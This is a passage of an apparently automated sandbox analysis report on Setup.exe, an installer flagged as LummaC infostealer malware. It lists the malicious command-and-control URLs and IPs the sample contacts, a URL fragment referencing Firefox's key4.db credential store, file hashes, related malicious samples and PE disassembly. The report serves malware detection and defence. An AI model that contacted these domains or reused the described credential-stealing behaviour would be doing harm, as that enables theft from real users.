https://beefshooti.click/apiA	Setup.exe, 00000000.00000003.1851207669.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851695824.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000004.00000002.2018847996.0000000004A11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beefshooti.click:443/api2o4p.default-release/key4.dbPK	Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://beefshooti.click:443/apiN	Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.2018847996.0000000004531000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.remobjects.com/ps	Setup.exe	false		high
http://x1.c.lencr.org/0	Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Setup.exe, 00000000.00000003.1825827041.00000000038D3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.innosetup.com/	Setup.exe	false		high
https://klipcatepiu0.shop/	Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://klipcatepiu0.shop/int_clp_ldr_sha.txtDZ	Setup.exe, 00000000.00000002.1998349657.000000000100D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.2018847996.0000000004531000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beefshooti.click:443/api	Setup.exe, 00000000.00000003.1909177966.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://beefshooti.click/aN	Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://beefshooti.click/apij	Setup.exe, 00000000.00000003.1876780873.00000000038AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1874200327.00000000038AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beefshooti.click/	Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903279526.000000000104B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1951085152.000000000105C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1905498616.000000000104D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipcatepiu0.shop/hB	Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://neqi.shop/sdgjyut/psh.txtM	Setup.exe, 00000000.00000002.1998349657.0000000001033000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beefshooti.click/apih3=	Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Setup.exe, 00000000.00000003.1825827041.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851951201.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825717607.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851091316.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851360446.00000000038F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beefshooti.click/apiN	Setup.exe, 00000000.00000003.1909177966.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1995816294.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://neqi.shop:443/sdgjyut/psh.txt	Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://klipcatepiu0.shop/int_clp_ldr_sha.txtS	Setup.exe, 00000000.00000003.1996461951.000000000105E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.microsof	Setup.exe, 00000000.00000003.1825717607.0000000003901000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	false		high
https://neqi.shop/sdgjyut/psh.txtf5	Setup.exe, 00000000.00000003.1995816294.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beefshooti.click/asse	Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Setup.exe, 00000000.00000003.1825827041.00000000038D3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beefshooti.click:443/apim	Setup.exe, 00000000.00000003.1909177966.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.18.185	beefshooti.click	United States		13335	CLOUDFLARENETUS	true
104.21.27.229	neqi.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580125
Start date and time:	2024-12-24 01:11:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/5@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 14 Number of non-executed functions: 128
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3720 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
19:12:16	API Interceptor	10x Sleep call for process: Setup.exe modified
19:12:36	API Interceptor	16x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.18.185	Setup.exe	Get hash	malicious	LummaC	Browse
104.21.18.185	https://extrn.offer-21890.com/sign-in?op_token=DRZhttpskostik	Get hash	malicious	Unknown	Browse
104.21.27.229	Setup.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
beefshooti.click	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.18.185
neqi.shop	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.27.229
	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	Setup.exe	Get hash	malicious	LummaC	Browse	194.58.112.174
	Setup.exe	Get hash	malicious	LummaC	Browse	194.58.112.174
	Full_Ver_Setup.exe	Get hash	malicious	LummaC	Browse	194.58.112.174

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	installer.msi	Get hash	malicious	Unknown	Browse	104.21.80.93
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.58.45
	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	https://en.newsnowbangla.com/archives/69912	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	104.17.25.14
	https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
CLOUDFLARENETUS	installer.msi	Get hash	malicious	Unknown	Browse	104.21.80.93
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.58.45
	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	https://en.newsnowbangla.com/archives/69912	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	104.17.25.14
	https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.18.185
	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.18.185
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	104.21.27.229 104.21.18.185
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.27.229 104.21.18.185
	ZysXVT72cl.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.18.185
	NxqDwaYpbp.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.18.185
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.18.185
	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.27.229 104.21.18.185
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	104.21.27.229 104.21.18.185
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.18.185

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulPki/llllZ:NllUcylll
MD5:	D8D47FD6FA3E199E4AFF68B91F1D04A8
SHA1:	788625E414B030E5174C5BE7262A4C93502C2C21
SHA-256:	2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
SHA-512:	5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1odyn1qj.bmh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mn2pm3my.kvn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phlq24iz.aln.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi51u4ma.c5p.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	0.6743212123134371
TrID:	Win32 Executable (generic) a (10002005/4) 97.75% Windows ActiveX control (116523/4) 1.14% Inno Setup installer (109748/4) 1.07% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	Setup.exe
File size:	76'122'589 bytes
MD5:	79c238ebe5c951b14e9e4729ce73fcc9
SHA1:	87b1590ebd335e94594e654d1c78ce08067d9d1f
SHA256:	09c43883e99bf9db74a86431dec7827fa5e112afe0e7efe952f4f50be249c4a6
SHA512:	3bfcdc13c61436d0e216919bf8d9b047946ecd5a7fd95ac2dfa148d18b83f4d571c7a5256ec2bfc490f2433a73da91f069b5f72e6324edd05325a2b64a036ef1
SSDEEP:	98304:wJ9VM+LtVt3P/KuG2ONG9iqaRQM333CiRHTf:0VL/tnHGYiqCECHTf
TLSH:	B4F77B06B344EC2BFAF69635253282CC442A696367254DF747A82B7C7E310F71936EC6
File Content Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0974e4c4e4e47441

Static PE Info

General

Entrypoint:	0x6adbf4
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABC [Fri Jul 12 07:26:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	d6ea28a9f4da0730c2562f3beec87130

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	15/12/2020 21:24:20 02/12/2021 21:24:20
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	4068B1B0494EFA79F5A751DCCA8111CD
Thumbprint SHA-1:	914A09C2E02C696AF394048BCB8D95449BCD5B9E
Thumbprint SHA-256:	4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
Serial:	33000003DFFB6AE3F427ECB6A30000000003DF

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 006A1758h
call 00007FC6C859A222h
mov eax, dword ptr [006B7ADCh]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000190h]
push FFFFFFECh
push eax
call 00007FC6C859E855h
mov edx, dword ptr [006B7ADCh]
mov edx, dword ptr [edx]
mov edx, dword ptr [edx+00000190h]
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
push edx
call 00007FC6C859E841h
xor eax, eax
push ebp
push 006ADC85h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007FC6C859DB34h
call 00007FC6C882994Fh
mov eax, dword ptr [006A137Ch]
push eax
push 006A1414h
mov eax, dword ptr [006B7ADCh]
mov eax, dword ptr [eax]
call 00007FC6C8733D18h
mov eax, 0069C190h
mov edx, dword ptr [006B7944h]
mov dword ptr [edx], eax
call 00007FC6C8829996h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007FC6C88360FBh
jmp 00007FC6C859202Bh
call 00007FC6C88296DAh
mov eax, 00000001h
call 00007FC6C8592B18h
call 00007FC6C859246Fh
mov eax, dword ptr [006B7ADCh]
mov eax, dword ptr [eax]
mov edx, 006ADE18h
call 00007FC6C87337E2h
push 00000005h
mov eax, dword ptr [006B7ADCh]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000190h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2c5000	0x6e	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c0000	0x3a6a	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x305000	0x80600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x489680d	0x21d0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2c8000	0x3cd3c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2c7000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2c09f8	0x8e0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x2c4000	0xe28	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2a910c	0x2a9200	6ad4e2f6323b64299e4c17ab66f8fecc	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x2ab000	0x2e24	0x3000	4aadf43ce8bf8e2d71c98187b11e0b7d	False	0.4940592447916667	data	6.150722356110934	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2ae000	0x9e18	0xa000	9c5114b05054094107967068f16428b9	False	0.5979736328125	data	6.333690263645768	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x2b8000	0x7cd0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2c0000	0x3a6a	0x3c00	c255c35dc8b2afb5a1e8a0d53ec7a7b6	False	0.3244140625	PDP-11 overlaid pure executable	5.195700686476652	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x2c4000	0xe28	0x1000	eb38b8d680c9b49ddcbbfdf40683169f	False	0.311767578125	data	4.032868001403646	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x2c5000	0x6e	0x200	54166a993ddfc95afd7da99ac7579d19	False	0.173828125	data	1.3044245768916944	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x2c6000	0x58	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x2c7000	0x5d	0x200	2bd0b4250f44ecdcc366775e042632aa	False	0.189453125	data	1.3744124358228273	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
